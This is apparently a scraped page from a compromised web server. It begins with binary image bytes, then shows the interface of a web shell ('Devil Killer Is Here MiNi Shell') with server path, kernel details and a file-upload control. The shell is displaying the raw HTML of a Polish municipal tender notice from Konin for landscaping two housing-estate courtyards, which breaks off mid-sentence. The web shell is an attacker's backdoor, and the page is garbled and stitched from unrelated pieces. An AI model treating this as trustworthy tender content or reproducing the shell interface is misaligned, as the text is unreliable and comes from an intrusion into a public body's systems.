JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230818/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230818/0035764701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie Zielonego Podwórka Miejskiego – Osiedla Diamentowego i Zielonego Podwórka Miejskiego - V Osiedla </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Konin</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Urząd Miejski w Koninie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 311019036</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Wolności 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Konin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">62-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL414 - Koniński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">63 24011382</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@konin.um.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.konin.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie Zielonego Podwórka Miejskiego – Osiedla Diamentowego i Zielonego Podwórka Miejskiego - V Osiedla </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7a656340-3a9f-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00357647</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-08-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00056684/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.9 Wykonanie Zielonego Podwórka Miejskiego – Osiedla Diamentowego i Zielonego Podwórka Miejskiego - V Osiedla</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt pn. „Zielone korytarze miejskie – klimatyczne przebudzenie w Koninie” realizowany w ramach Programu „Środowisko, energia i zmiany klimatu” finansowanego ze środków Mechanizmu Finansowego EOG i budżetu państwa. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://konin.logintrade.net/zapytania_email,137553,aad259f3513ecb3d5a712817985257e2.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://konin.logintrade.net/zapytania_email,137553,aad259f3513ecb3d5a712817985257e2.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Korespondencja prowadzona będzie<br/>zgodnie z zasadami określonymi w Części III SWZ - Środki komunikacji elektronicznej. Wymagania techniczne i organizacyjne<br/>komunikacji elektronicznej.<br/>Informacje dostępne są również na Platformie Przetargowej:<br/>https://konin.logintrade.net/rejestracja/instrukcje.html. Dodatkowo, w sytuacji awarii, przerwy technicznej lub kłopotów z działaniem Platformy Przetargowej, Zamawiający dopuszcza komunikację za pośrednictwem poczty elektronicznej:<br/>zamowienia@konin.um.gov.pl (nie dotyczy to składania ofert wraz z oświadczeniami o niepodleganiu wykluczeniu i spełnianiu<br/>warunków udziału w postępowaniu).<br/>2. Oświadczenia, dokumenty lub inne informacje w postępowaniu o udzielenie zamówienia sporządzane są i przekazywane w<br/>sposób określony w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie.<br/>3. Ofertę należy złożyć w języku polskim, pod rygorem nieważności, w formie elektronicznej (co oznacza postać elektroniczną opatrzoną kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z postanowieniami zawartymi w Części XVII. SWZ -<br/>Przetwarzanie i ochrona danych osobowych</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WP.042.6.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie I - Zielone Podwórko Miejskie – Osiedle Diamentowe, wykonanie kompleksowo całego ogrodu, zakres prac:<br/>1.	Roboty przygotowawcze (w tym wycinka drzew i krzewów, przygotowanie całego terenu, tj. oczyszczenie ze śmieci, gałęzi, kamieni itp., odchwaszczenie, skoszenie.<br/>UWAGA! Ze względu na konieczność wycinki drzew przed ich usunięciem konieczna jest weryfikacja ich pod względem występowania chronionych gatunków ptaków),<br/>2.	Wytyczenie i wykonanie ścieżek.<br/>Ścieżki, które mają w projekcie szerokość poniżej 2,00 m należy wykonać o szerokości co najmniej 2,00 m (z wyłączeniem ścieżki z płyt kamiennych/betonowych).<br/>UWAGA! Zgodnie z opinią Koordynatora ds. dostępności, nawierzchnia mineralna, wodoprzepuszczalna powinna być odpowiednio mocno utwardzona, by osoby poruszające się na wózkach, z wózkami, z kulami itp. miały solidne oparcie. <br/>3.	Nawierzchnia mineralna na całym terenie os. Diamentowego wynosi ok. 1 120,00 m2. Ścieżka z płyt kamiennych w przybliżeniu wynosi ok. 126,00 m2. <br/>UWAGA! Dla ścieżki z płyt kamiennych dopuszcza się zastosowanie zamienne z płyt betonowych o wymiarach: długość 150,00 - 200,00 cm, szerokość 30,00 - 60,00 cm i grubość 6,00 - 8,00 cm.<br/>4.	Nasadzenia roślinnością zatrzymującą wodę i dającą cień, w tym:<br/>4.1.	wykonanie wszystkich nasadzeń,<br/>4.2.	nasadzenia w donicach (łącznie 5 donic),<br/>UWAGA! Należy przyjąć ilość roślin wskazaną w opisie technicznym punkt 4.12 Zieleń Tabela 4.<br/>5.	Wykonanie łąki kwietnej, o pow. ok. 976,00 m2 – pod łąkę kwietną należy wykonać rozścielenia ziemią urodzajną na grubość 30,00 cm,<br/>6.	Wykonanie infrastruktury edukacyjnej – systemu wód opadowych, składającego się z:<br/>6.1.	liści zbierających wodę – 6 szt.,<br/>6.2.	łapacza wody opadowej – 1 szt.,<br/>6.3.	suchego potoku,<br/>6.4.	ogrodu deszczowego,<br/>6.5.	niecki retencyjnej.<br/>7.	Montaż elementów małej architektury, w tym:<br/>7.1.	ławki z donicą na zieleń – 4 szt.,<br/>7.2.	ławka z zieloną donicą z funkcją redbox – miejska gra edukacyjna – 1 szt.,<br/>7.3.	kosze do segregacji śmieci – 4 szt., (4 sztuki po 4 pojemniki).<br/>UWAGA! <br/>•	Zakres prac nie obejmuje wyniesienia terenu ograniczonego stalą corten, tablicy informacyjno-edukacyjnej oraz miejsc do zjeżdżania na sankach.<br/>•	Załączniki graficzne: 15. detal: ławka z donicą, 16. detal: ławka z donicą – redbox, 17. detal – kosz do segregacji odpadów, są pokazane jako przykładowe rozwiązania. Wiążącym dokumentem postępowania jest opis techniczny (pkt. 4.5 Elementy małej architektury). <br/>8. W miejscu projektowanych nasadzeń roślinności należy zebrać darń i wykonać połaciową wymianę gruntu rodzimego na ziemię urodzajną z domieszką hydrożelu (2g/1l podłoża), warstwa 25,00 cm.<br/>9.	Pod nasadzenia roślin w gruncie należy rozłożyć agrowłókninę i na niej rozsypać korę sosnową o frakcji 10,00 – 40,00 mm, warstwa kory o grubości 5,00 cm. Powierzchnia wszystkich rabat, na których należy rozłożyć agrowłókninę i rozsypać korę wynosi 239,43 m2, w tym:<br/>9.1.	rabata A - 70,48 m2 <br/>9.2.	rabata B i C - 31,84 m2 + 11,50 m2 = 43,34 m2<br/>9.3.	rabata D - 40,98 m2<br/>9.4.	rabata E - 84,63 m2 <br/>10.	Ogród deszczowy i nasadzenia przy niecce retencyjnej bez agrowłókniny i kory. Do tych nasadzeń należy zastosować warstwę żwiru o grubości 5,00 cm, frakcja żwiru 8,00 – 16,00 mm.<br/>11.	Do oddzielenia rabat od trawników należy zastosować obrzeża stalowe o łącznej długości 100,97 mb, w tym:<br/>11.1.	rabata A - 33,53 mb,<br/>11.2.	rabata B i C - 21,31 mb,<br/>11.3.	rabata D - 28,89 mb,<br/>11.4.	rabata E - 17,24 mb.<br/>12.	Obramowania nawierzchni mineralnej oraz ścieżki typ mozaika należy wykonać z obrzeża betonowego (zmiana projektowa). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45112710-5 - Roboty w zakresie kształtowania terenów zielonych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych</p> <p class="mb-0">43325000-7 - Wyposażenie parków i placów zabaw</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert Zamawiający kierował się będzie kryteriami przyjętymi w postępowaniu. Punktacja zostanie przyznana na podstawie informacji podanych przez Wykonawcę w ofercie. Opis sposobu oceny ofert określony został w cz. VII SWZ - Kryteria oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużenie okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie II - Zielone Podwórko Miejskie – V Osiedle, zakres prac:<br/>1.	Roboty rozbiórkowe, przygotowawcze (w tym rozbiórka istniejącej ścieżki asfaltowej wraz z podbudową i obrzeżami),<br/>2.	Wykonanie ścieżek z nawierzchni mineralnej przepuszczalnej o pow. ok. 850,00 m2 wraz z obramowaniem nawierzchni ścieżki. Obramowanie należy wykonać z obrzeży betonowych (zmiana projektowa),<br/>UWAGA! Zgodnie z opinią Koordynatora ds. dostępności, nawierzchnia mineralna, wodoprzepuszczalna powinna być odpowiednio mocno utwardzona, by osoby poruszające się na wózkach, z wózkami, z kulami itp. miały solidne oparcie. <br/>3.	Nasadzenia roślinnością zatrzymującą wodę i dającą cień, w tym:<br/>3.1.	wykonanie rabat: D, F, G oraz rabat przy nieckach retencyjnych, <br/>3.2.	nasadzenia drzew – 3 szt.,<br/>3.3.	nasadzenia w donicach (łącznie 11 donic),<br/>3.4.	nasadzenia w gazonach (10 gazonów),<br/>UWAGA! Przy wykonywaniu rabat F i G zobowiązuje się Wykonawcę do ustalenia z Zamawiającym ostatecznych lokalizacji rabat.<br/>4.	System retencji wód opadowych (5 szt.) składający się z:<br/>4.1.	niecki retencyjnej I o pow. ok. 85,00 m2,<br/>4.2.	niecki retencyjnej II o pow. ok. 115,00 m2 ,<br/>4.3.	łapacza wody opadowej – 3 szt.,<br/>5.	Montaż elementów małej architektury, w tym:<br/>5.1.	ławki z donicą na zieleń – 10szt.,<br/>5.2.	zielona donica z funkcją redbox – miejska gra edukacyjna – 1 szt. (lokalizacja zostanie wskazana na etapie wykonawstwa),<br/>5.3.	gazony z zielenią pochłaniającą spaliny – 10 szt.,<br/>5.4.	kosze do segregacji śmieci – 10 szt., (10 sztuk po 4 pojemniki).<br/>UWAGA! <br/>•	Zakres prac nie obejmuje wykonania rabat: A, B, E i H, nasadzeń przy donicy z funkcją redbox, nawierzchni żwirowej, tablicy informacyjno-edukacyjnej i tablicy Braille’a.<br/>•	Załączniki graficzne: 12. detal – gazon z zielenią pochłaniającą spaliny, 13. detal: donica z funkcją redbox, 14. detal - ławka z donicą, 16. detal – kosz do segregacji śmieci są pokazane jako przykładowe rozwiązania. Wiążącym dokumentem postępowania jest opis techniczny.<br/>6.	W miejscu projektowanych nasadzeń roślinności należy zebrać darń i wykonać połaciową wymianę gruntu rodzimego na ziemię urodzajną z domieszką hydrożelu (2g/1l podłoża), warstwa 25,00 cm.<br/>7.	Pod nasadzenia roślin w gruncie należy rozłożyć agrowłókninę i na niej rozsypać korę sosnową o frakcji 10,00 – 40,00 mm, warstwa kory o grubości 5,00 cm. Powierzchnia wszystkich rabat,na których należy rozłożyć agrowłókninę i rozsypać korę wynosi 240,57 m2, w tym:<br/>7.1.	rabata D - 158,89 m2,<br/>7.2.	rabata F - 31,93 m2,<br/>7.3.	rabata G - 49,75 m2,<br/>8.	Nasadzenia przy nieckach retencyjnych bez agrowłókniny i kory. Dla tych nasadzeń należy zastosować warstwę żwiru o grubości 5,00 cm, frakcja żwiru 8,00 – 16,00 mm.<br/>9.	Do oddzielenia rabat z korą od trawników należy zastosować obrzeża metalowe o łącznej długości 62,70 mb, w tym: <br/>9.1.	rabata D - 16,94 mb,<br/>9.2.	rabata F - 13,21 mb,<br/>9.3.	rabata G - 18,84 mb,<br/>9.4.	rabata przy niecce retencyjnej - 13,71 mb. <br/>10.	Do oddzielenia rabat od ciągów pieszych należy zastosować obrzeża betonowe. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45112710-5 - Roboty w zakresie kształtowania terenów zielonych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych</p> <p class="mb-0">43325000-7 - Wyposażenie parków i placów zabaw</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert Zamawiający kierował się będzie kryteriami przyjętymi w postępowaniu. Punktacja zostanie przyznana na podstawie informacji podanych przez Wykonawcę w ofercie. Opis sposobu oceny ofert określony został w cz. VII SWZ - Kryteria oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużenie okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki udziału w postępowaniu - dla Zadania I i II.<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące<br/>zdolności technicznej lub zawodowej. Warunki te zostaną uznane za spełnione, jeżeli Wykonawca:<br/>1. wykaże, że w okresie pięciu ostatnich lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności<br/>jest krótszy, w tym okresie, zrealizował zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył co najmniej:<br/>1.1. dla Zadania I: dwie roboty budowlane polegające na zagospodarowaniu terenu, obejmujące montaż elementów małej<br/>architektury i założenie zieleni lub pielęgnację zieleni wraz z montażem elementów małej architektury, o wartości nie<br/>mniejszej niż 350.000,00 zł brutto każda,<br/>1.2. dla Zadania II: dwie roboty budowlane polegające na zagospodarowaniu terenu, obejmujące montaż elementów małej<br/>architektury i założenie zieleni lub pielęgnację zieleni wraz z montażem elementów małej architektury, o wartości nie<br/>mniejszej niż 350.000,00 zł brutto każda.<br/>W przypadku złożenia ofert na oba Zadania, Wykonawca może się wykazać tym samym doświadczeniem.<br/>2. skieruje do realizacji zamówienia osoby zdolne do jego wykonania na odpowiednim poziomie jakości, w tym co najmniej<br/>jedną osobę do nadzorowania wykonywanych prac w zakresie zagospodarowania terenu, legitymującą się co najmniej 2-<br/>letnim doświadczeniem w kierowaniu pracami dotyczącymi utrzymania i pielęgnacji zieleni.<br/>W przypadku złożenia ofert na oba Zadania, Wykonawca może wskazać tę samą osobę dla obu zadań.<br/>3. W przypadku składania oferty wspólnej, powyższe warunki Wykonawcy powinni spełnić łącznie. W odniesieniu do<br/>warunków dotyczących 